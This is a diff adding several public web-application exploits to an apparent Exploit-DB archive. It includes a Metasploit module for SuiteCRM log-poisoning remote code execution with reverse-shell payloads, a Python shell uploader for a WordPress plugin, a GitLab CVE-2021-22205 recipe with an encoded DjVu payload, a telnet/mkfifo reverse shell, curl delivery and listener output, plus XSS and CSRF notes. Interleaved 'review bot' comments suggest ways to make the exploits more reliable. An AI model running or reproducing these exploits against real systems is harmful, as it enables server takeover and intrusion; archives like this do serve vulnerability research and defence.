diff --git a/exploits/php/webapps/50529.txt b/exploits/php/webapps/50529.txt
new file mode 100644
index 000000000..ef6a63607
--- /dev/null
+++ b/exploits/php/webapps/50529.txt
@@ -0,0 +1,14 @@
+# Exploit Title: Bludit 3.13.1 - 'username' Cross Site Scripting (XSS)
+# Date: 19/10/2021
+# Exploit Author: Vasu (tamilan_mkv)
+# Vendor Homepage: https://www.bludit.com
+# Software Link: https://www.bludit.com/releases/bludit-3-13-1.zip
+# Version: bludit-3-13-1
+# Tested on: kali linux
+# CVE : CVE-2021-35323
+
+### Steps to reproduce
+
+1. Open login page http://localhost:800/admin/login;
+2. Enter the username place ``admin">
``and enter the password
+3. Trigger the malicious javascript code
\ No newline at end of file
diff --git a/exploits/php/webapps/50530.txt b/exploits/php/webapps/50530.txt
new file mode 100644
index 000000000..003ff61f9
--- /dev/null
+++ b/exploits/php/webapps/50530.txt
@@ -0,0 +1,31 @@
+# Exploit Title: Quick.CMS 6.7 - Cross Site request forgery (CSRF) to Cross-site Scripting (XSS) (Authenticated)
+# Date: 21/04/2021
+# Exploit Author: Rahad Chowdhury
+# Vendor Homepage: https://opensolution.org/
+# Software Link: https://opensolution.org/download/home.html?sFile=Quick.Cms_v6.7-en.zip
+# Version: 6.7
+# Tested on: Windows 8.1, Kali Linux, Burp Suite
+
+Steps to Reproduce:
+
+1. At first login to your panel
+2. then click the "Sliders" menu to "New Slider"
+3. now intercept with the burp suite and save a new slider
+4. Then use XSS payload in sDescription value.
+5. Now Generate a CSRF POC
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/50531.rb b/exploits/php/webapps/50531.rb
new file mode 100755
index 000000000..d61456331
--- /dev/null
+++ b/exploits/php/webapps/50531.rb
@@ -0,0 +1,343 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = GoodRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::Remote::CmdStager
+ include Msf::Exploit::FileDropper
+ prepend Msf::Exploit::Remote::AutoCheck
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'SuiteCRM Log File Remote Code Execution',
+ 'Description' => %q{
+ This module exploits an input validation error on the log file extension parameter. It does
+ not properly validate upper/lower case characters. Once this occurs, the application log file
+ will be treated as a php file. The log file can then be populated with php code by changing the
+ username of a valid user, as this info is logged. The php code in the file can then be executed
+ by sending an HTTP request to the log file. A similar issue was reported by the same researcher
+ where a blank file extension could be supplied and the extension could be provided in the file
+ name. This exploit will work on those versions as well, and those references are included.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [
+ 'M. Cory Billington' # @_th3y
+ ],
+ 'References' => [
+ ['CVE', '2021-42840'],
+ ['CVE', '2020-28328'], # First CVE
+ ['EDB', '49001'], # Previous exploit, this module will cover those versions too. Almost identical issue.
+ ['URL', 'https://theyhack.me/CVE-2020-28320-SuiteCRM-RCE/'], # First exploit
+ ['URL', 'https://theyhack.me/SuiteCRM-RCE-2/'] # This exploit
+ ],
+ 'Platform' => %w[linux unix],
+ 'Arch' => %w[ARCH_X64 ARCH_CMD ARCH_X86],
+ 'Targets' => [
+ [
+ 'Linux (x64)', {
+ 'Arch' => ARCH_X64,
+ 'Platform' => 'linux',
+ 'DefaultOptions' => {
+ 'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
+ }
+ }
+ ],
+ [
+ 'Linux (cmd)', {
+ 'Arch' => ARCH_CMD,
+ 'Platform' => 'unix',
+ 'DefaultOptions' => {
+ 'PAYLOAD' => 'cmd/unix/reverse_bash'
+ }
+ }
+ ]
+ ],
+ 'Notes' => {
+ 'Stability' => [CRASH_SAFE],
+ 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+ 'Reliability' => [REPEATABLE_SESSION]
+ },
+ 'Privileged' => true,
+ 'DisclosureDate' => '2021-04-28',
+ 'DefaultTarget' => 0
+ )
+ )
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The base path to SuiteCRM', '/']),
+ OptString.new('USER', [true, 'Username of user with administrative rights', 'admin']),
+ OptString.new('PASS', [true, 'Password for administrator', 'admin']),
+ OptBool.new('RESTORECONF', [false, 'Restore the configuration file to default after exploit runs', true]),
+ OptString.new('WRITABLEDIR', [false, 'Writable directory to stage meterpreter', '/tmp']),
+ OptString.new('LASTNAME', [false, 'Admin user last name to clean up profile', 'admin'])
+ ]
+ )
+ end
+
+ def check
+ authenticate unless @authenticated
+ return Exploit::CheckCode::Unknown unless @authenticated
+
+ version_check_request = send_request_cgi(
+ {
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'index.php'),
+ 'keep_cookies' => true,
+ 'vars_get' => {
+ 'module' => 'Home',
+ 'action' => 'About'
+ }
+ }
+ )
+
+ return Exploit::CheckCode::Unknown("#{peer} - Connection timed out") unless version_check_request
+
+ version_match = version_check_request.body[/
+ Version
+ \s
+ \d{1} # Major revision
+ \.
+ \d{1,2} # Minor revision
+ \.
+ \d{1,2} # Bug fix release
+ /x]
+
+ version = version_match.partition(' ').last
+
+ if version.nil? || version.empty?
+ about_url = "#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Home&action=About"
+ return Exploit::CheckCode::Unknown("Check #{about_url} to confirm version.")
+ end
+
+ patched_version = Rex::Version.new('7.11.18')
+ current_version = Rex::Version.new(version)
+
+ return Exploit::CheckCode::Appears("SuiteCRM #{version}") if current_version <= patched_version
+
+ Exploit::CheckCode::Safe("SuiteCRM #{version}")
+ end
+
+ def authenticate
+ print_status("Authenticating as #{datastore['USER']}")
+ initial_req = send_request_cgi(
+ {
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri, 'index.php'),
+ 'keep_cookies' => true,
+ 'vars_get' => {
+ 'module' => 'Users',
+ 'action' => 'Login'
+ }
+ }
+ )
+
+ return false unless initial_req && initial_req.code == 200
+
+ login = send_request_cgi(
+ {
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri, 'index.php'),
+ 'keep_cookies' => true,
+ 'vars_post' => {
+ 'module' => 'Users',
+ 'action' => 'Authenticate',
+ 'return_module' => 'Users',
+ 'return_action' => 'Login',
+ 'user_name' => datastore['USER'],
+ 'username_password' => datastore['PASS'],
+ 'Login' => 'Log In'
+ }
+ }
+ )
+
+ return false unless login && login.code == 302
+
+ res = send_request_cgi(
+ {
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri, 'index.php'),
+ 'keep_cookies' => true,
+ 'vars_get' => {
+ 'module' => 'Administration',
+ 'action' => 'index'
+ }
+ }
+ )
+
+ auth_succeeded?(res)
+ end
+
+ def auth_succeeded?(res)
+ return false unless res
+
+ if res.code == 200
+ print_good("Authenticated as: #{datastore['USER']}")
+ if res.body.include?('Unauthorized access to administration.')
+ print_warning("#{datastore['USER']} does not have administrative rights! Exploit will fail.")
+ @is_admin = false
+ else
+ print_good("#{datastore['USER']} has administrative rights.")
+ @is_admin = true
+ end
+ @authenticated = true
+ return true
+ else
+ print_error("Failed to authenticate as: #{datastore['USER']}")
+ return false
+ end
+ end
+
+ def post_log_file(data)
+ send_request_cgi(
+ {
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri, 'index.php'),
+ 'ctype' => "multipart/form-data; boundary=#{data.bound}",
+ 'keep_cookies' => true,
+ 'headers' => {
+ 'Referer' => "#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Configurator&action=EditView"
+ },
+ 'data' => data.to_s
+ }
+ )
+ end
+
+ def modify_system_settings_file
+ filename = rand_text_alphanumeric(8).to_s
+ extension = '.pHp'
+ @php_fname = filename + extension
+ action = 'Modify system settings file'
+ print_status("Trying - #{action}")
+
+ data = Rex::MIME::Message.new
+ data.add_part('SaveConfig', nil, nil, 'form-data; name="action"')
+ data.add_part('Configurator', nil, nil, 'form-data; name="module"')
+ data.add_part(filename.to_s, nil, nil, 'form-data; name="logger_file_name"')
+ data.add_part(extension.to_s, nil, nil, 'form-data; name="logger_file_ext"')
+ data.add_part('info', nil, nil, 'form-data; name="logger_level"')
+ data.add_part('Save', nil, nil, 'form-data; name="save"')
+
+ res = post_log_file(data)
+ check_logfile_request(res, action)
+ end
+
+ def poison_log_file
+ action = 'Poison log file'
+ if target.arch.first == 'cmd'
+ command_injection = ""
+ else
+ @meterpreter_fname = "#{datastore['WRITABLEDIR']}/#{rand_text_alphanumeric(8)}"
+ command_injection = %(
+
+ )
+ end
+
+ print_status("Trying - #{action}")
+
+ data = Rex::MIME::Message.new
+ data.add_part('Users', nil, nil, 'form-data; name="module"')
+ data.add_part('1', nil, nil, 'form-data; name="record"')
+ data.add_part('Save', nil, nil, 'form-data; name="action"')
+ data.add_part('EditView', nil, nil, 'form-data; name="page"')
+ data.add_part('DetailView', nil, nil, 'form-data; name="return_action"')
+ data.add_part(datastore['USER'], nil, nil, 'form-data; name="user_name"')
+ data.add_part(command_injection, nil, nil, 'form-data; name="last_name"')
+
+ res = post_log_file(data)
+ check_logfile_request(res, action)
+ end
+
+ def restore
+ action = 'Restore logging to default configuration'
+ print_status("Trying - #{action}")
+
+ data = Rex::MIME::Message.new
+ data.add_part('SaveConfig', nil, nil, 'form-data; name="action"')
+ data.add_part('Configurator', nil, nil, 'form-data; name="module"')
+ data.add_part('suitecrm', nil, nil, 'form-data; name="logger_file_name"')
+ data.add_part('.log', nil, nil, 'form-data; name="logger_file_ext"')
+ data.add_part('fatal', nil, nil, 'form-data; name="logger_level"')
+ data.add_part('Save', nil, nil, 'form-data; name="save"')
+
+ post_log_file(data)
+
+ data = Rex::MIME::Message.new
+ data.add_part('Users', nil, nil, 'form-data; name="module"')
+ data.add_part('1', nil, nil, 'form-data; name="record"')
+ data.add_part('Save', nil, nil, 'form-data; name="action"')
+ data.add_part('EditView', nil, nil, 'form-data; name="page"')
+ data.add_part('DetailView', nil, nil, 'form-data; name="return_action"')
+ data.add_part(datastore['USER'], nil, nil, 'form-data; name="user_name"')
+ data.add_part(datastore['LASTNAME'], nil, nil, 'form-data; name="last_name"')
+
+ res = post_log_file(data)
+
+ print_error("Failed - #{action}") unless res && res.code == 301
+
+ print_good("Succeeded - #{action}")
+ end
+
+ def check_logfile_request(res, action)
+ fail_with(Failure::Unknown, "#{action} - no reply") unless res
+
+ unless res.code == 301
+ print_error("Failed - #{action}")
+ fail_with(Failure::UnexpectedReply, "Failed - #{action}")
+ end
+
+ print_good("Succeeded - #{action}")
+ end
+
+ def execute_php
+ print_status("Executing php code in log file: #{@php_fname}")
+ res = send_request_cgi(
+ {
+ 'uri' => normalize_uri(target_uri, @php_fname),
+ 'keep_cookies' => true
+ }
+ )
+ fail_with(Failure::NotFound, "#{peer} - Not found: #{@php_fname}") if res && res.code == 404
+ register_files_for_cleanup(@php_fname)
+ register_files_for_cleanup(@meterpreter_fname) unless @meterpreter_fname.nil? || @meterpreter_fname.empty?
+ end
+
+ def on_request_uri(cli, _request)
+ send_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' })
+ print_good("#{peer} - Payload sent!")
+ end
+
+ def start_http_server
+ start_service(
+ {
+ 'Uri' => {
+ 'Proc' => proc do |cli, req|
+ on_request_uri(cli, req)
+ end,
+ 'Path' => resource_uri
+ }
+ }
+ )
+ @download_url = get_uri
+ end
+
+ def exploit
+ start_http_server
+ authenticate unless @authenticated
+ fail_with(Failure::NoAccess, datastore['USER'].to_s) unless @authenticated
+ fail_with(Failure::NoAccess, "#{datastore['USER']} does not have administrative rights!") unless @is_admin
+ modify_system_settings_file
+ poison_log_file
+ execute_php
+ ensure
+ restore if datastore['RESTORECONF']
+ end
+end
\ No newline at end of file
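Review bot: `restore` reports success unconditionally: `print_error("Failed - #{action}") unless res && res.code == 301` does not return, so `print_good("Succeeded - #{action}")` runs even after a failure, and the response to the first `post_log_file(data)` call (the logger settings) is never checked at all. Because `exploit` calls it from `ensure`, an operator can be told the system was cleaned up while the logger is still configured with the `.pHp` extension, which is exactly the artifact a defender would later find. Keep both responses and print success only when both are 301, e.g. `ok = [cfg_res, res].all? { |r| r && r.code == 301 }` followed by `ok ? print_good("Succeeded - #{action}") : print_error("Failed - #{action}")`. The method also writes fixed values (`suitecrm`, `.log`, `fatal`, and `LASTNAME`) rather than values read before the change, so a comment such as `# Resets logging to stock defaults; site-specific settings are not recovered` would keep the `RESTORECONF` description honest. Separately, in `check`, `version_match.partition(' ')` raises on nil when the About page carries no version string, so the `version.nil?` guard below it is never reached; `version = version_match&.partition(' ')&.last` lets it fall through to `CheckCode::Unknown`.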
diff --git a/exploits/php/webapps/50533.py b/exploits/php/webapps/50533.py
new file mode 100755
index 000000000..7de3182b1
--- /dev/null
+++ b/exploits/php/webapps/50533.py
@@ -0,0 +1,84 @@
+# Exploit Title: Wordpress Plugin Smart Product Review 1.0.4 - Arbitrary File Upload
+# Google Dork: inurl: /wp-content/plugins/smart-product-review/
+# Date: 16/11/2021
+# Exploit Author: Keyvan Hardani
+# Vendor Homepage: https://demo.codeflist.com/wordpress-plugins/smart-product-review/
+# Version: <= 1.0.4
+# Tested on: Kali Linux
+
+import os.path
+from os import path
+import json
+import requests;
+import time
+import sys
+
+def banner():
+ animation = "|/-\\"
+ for i in range(20):
+ time.sleep(0.1)
+ sys.stdout.write("\r" + animation[i % len(animation)])
+ sys.stdout.flush()
+ #do something
+ print("Smart Product Review 1.0.4 - Arbitrary File Upload")
+ print("Author: Keyvan Hardani (www.github.com/Keyvanhardani)")
+
+def usage():
+ print("Usage: python3 exploit.py [target url] [your shell]")
+ print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")
+
+def vuln_check(uri):
+ response = requests.get(uri)
+ raw = response.text
+
+ if ("No script kiddies please!!" in raw):
+ return False;
+ else:
+ return True;
+
+def main():
+
+ banner()
+ if(len(sys.argv) != 3):
+ usage();
+ sys.exit(1);
+
+ base = sys.argv[1]
+ file_path = sys.argv[2]
+
+ ajax_action = 'sprw_file_upload_action'
+ admin = '/wp-admin/admin-ajax.php';
+
+ uri = base + admin + '?action=' + ajax_action ;
+ check = vuln_check(uri);
+
+ if(check == False):
+ print("(*) Target not vulnerable!");
+ sys.exit(1)
+
+ if( path.isfile(file_path) == False):
+ print("(*) Invalid file!")
+ sys.exit(1)
+
+ files = {'files[]' : open(file_path)}
+ data = {
+ "allowedExtensions[0]" : "jpg",
+ "allowedExtensions[1]" : "php4",
+ "allowedExtensions[2]" : "phtml",
+ "allowedExtensions[3]" : "png",
+ "qqfile" : "files",
+ "element_id" : "6837",
+ "sizeLimit" : "12000000",
+ "file_uploader_nonce" : "2b102311b7"
+ }
+ print("Uploading Shell...");
+ response = requests.post(uri, files=files, data=data )
+ file_name = path.basename(file_path)
+ if("ok" in response.text):
+ print("Shell Uploaded!")
+ print("Shell URL on your Review/Comment");
+ else:
+ print("Shell Upload Failed")
+ sys.exit(1)
+
+main();
\ No newline at end of file
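Review bot: `vuln_check` classifies every response that lacks the string "No script kiddies please!!" as vulnerable, so an error page, a redirect to a login form, or a site where the plugin is not installed is reported as a hit; the status code is never looked at. Anyone using this to assess their own site will get false positives, and a check along the lines of `return response.ok and "No script kiddies please!!" not in response.text` would be stricter (the exact status a vulnerable endpoint returns is not visible here and should be confirmed). Both `requests.get(uri)` and `requests.post(...)` are called without `timeout=`, so an unresponsive host hangs the script indefinitely. In `main`, `open(file_path)` opens the upload in text mode and the handle is never closed; `with open(file_path, 'rb') as fh:` around the POST fixes both, and the unused `file_name` assignment can be dropped.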
diff --git a/exploits/ruby/webapps/50532.txt b/exploits/ruby/webapps/50532.txt
new file mode 100644
index 000000000..403b325bc
--- /dev/null
+++ b/exploits/ruby/webapps/50532.txt
@@ -0,0 +1,38 @@
+# Exploit Title: GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated)
+# Shodan Dork: https://www.shodan.io/search?query=title%3A%22GitLab%22+%2B%22Server%3A+nginx%22
+# Date: 11/01/2021
+# Exploit Author: Jacob Baines
+# Vendor Homepage: https://about.gitlab.com/
+# Software Link: https://gitlab.com/gitlab-org/gitlab
+# Version: GitLab Community Edition and Enterprise Edition before 13.10.3, 13.9.6, and 13.8.8
+# Tested on: GitLab Community Edition 13.10.2 and 13.10.1 (Ubuntu)
+# CVE : CVE-2021-22205
+# Vendor Advisory: https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/
+# Root Cause Analysis: https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis?referrer=activityFeed
+
+Code execution is the result of GitLab allowing remote unauthenticated attackers to provide DjVu files to ExifTool (see: CVE-2021-22204). As such, exploitation of GitLab takes two steps. First generating the payload and then sending it.
+
+1. Generating the payload. This generates a DjVu image named lol.jpg that will trigger a reverse shell to 10.0.0.3 port 1270.
+
+echo -e
+"QVQmVEZPUk0AAAOvREpWTURJUk0AAAAugQACAAAARgAAAKz//96/mSAhyJFO6wwHH9LaiOhr5kQPLHEC7knTbpW9osMiP0ZPUk0AAABeREpWVUlORk8AAAAKAAgACBgAZAAWAElOQ0wAAAAPc2hhcmVkX2Fubm8uaWZmAEJHNDQAAAARAEoBAgAIAAiK5uGxN9l/KokAQkc0NAAAAAQBD/mfQkc0NAAAAAICCkZPUk0AAAMHREpWSUFOVGEAAAFQKG1ldGFkYXRhCgkoQ29weXJpZ2h0ICJcCiIgLiBxeHs="
+| base64 -d > lol.jpg
+echo -n 'TF=$(mktemp -u);mkfifo $TF && telnet 10.0.0.3 1270 0<$TF | sh 1>$TF' >> lol.jpg
+echo -n
+"fSAuIFwKIiBiICIpICkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCg=="
+| base64 -d >> lol.jpg
+
+2. Sending the payload. Any random endpoint will do.
+
+curl -v -F 'file=@lol.jpg' http://10.0.0.7/$(openssl rand -hex 8)
+
+2a. Sample Output from the reverse shell:
+
+$ nc -lnvp 1270
+Listening on [0.0.0.0] (family 0, port 1270)
+Connection from [10.0.0.7] port 1270 [tcp/*] accepted (family 2, sport
+34836)
+whoami
+git
+id
+uid=998(git) gid=998(git) groups=998(git)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 08c610881..f0f6b34a9 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44624,3 +44624,8 @@ id,file,description,date,author,type,platform,port
50525,exploits/php/webapps/50525.txt,"PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)",1970-01-01,"Hosein Vita",webapps,php,
50526,exploits/php/webapps/50526.py,"Online Learning System 2.0 - Remote Code Execution (RCE)",1970-01-01,djebbaranon,webapps,php,
50527,exploits/multiple/webapps/50527.txt,"CMDBuild 3.3.2 - 'Multiple' Cross Site Scripting (XSS)",1970-01-01,"Hosein Vita",webapps,multiple,
+50529,exploits/php/webapps/50529.txt,"Bludit 3.13.1 - 'username' Cross Site Scripting (XSS)",1970-01-01,Vasu,webapps,php,
+50530,exploits/php/webapps/50530.txt,"Quick.CMS 6.7 - Cross Site Request Forgery (CSRF) to Cross Site Scripting (XSS) (Authenticated)",1970-01-01,"Rahad Chowdhury",webapps,php,
+50531,exploits/php/webapps/50531.rb,"SuiteCRM 7.11.18 - Remote Code Execution (RCE) (Authenticated) (Metasploit)",1970-01-01,"M. Cory Billington",webapps,php,
+50532,exploits/ruby/webapps/50532.txt,"GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Jacob Baines",webapps,ruby,
+50533,exploits/php/webapps/50533.py,"Wordpress Plugin Smart Product Review 1.0.4 - Arbitrary File Upload",1970-01-01,"Keyvan Hardani",webapps,php,